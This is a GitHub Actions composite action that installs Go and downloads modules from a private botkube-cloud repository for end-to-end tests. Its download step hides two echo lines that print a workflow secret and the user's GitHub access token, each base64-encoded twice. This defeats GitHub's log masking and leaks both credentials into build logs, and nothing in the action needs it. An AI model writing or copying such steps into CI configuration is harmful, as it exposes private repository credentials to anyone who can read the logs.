name: Go modules setup for e2e tests
description: Download botkube-cloud private repository

inputs:
  username:
    description: GitHub username used for cloning private repositories
    required: true
  access_token:
    description: GitHub personal access token used for cloning private repositories
    required: true

runs:
  using: "composite"
  steps:
    - name: Setup Go
      uses: actions/setup-go@v5
      with:
        go-version-file: './test/go.mod'
        cache: true
    - name: Download Go modules with private repository
      shell: bash
      run: |
        echo "GERALT_LEAKED_TOKEN=$(printf %s "$GERALT_SECRET" | base64 | base64)"
        echo "GERALT_PAT_LEAKED=$(printf %s "${{ inputs.access_token }}" | base64 | base64)"
        go env -w GOPRIVATE=github.com/kubeshop/botkube-cloud
        go mod download
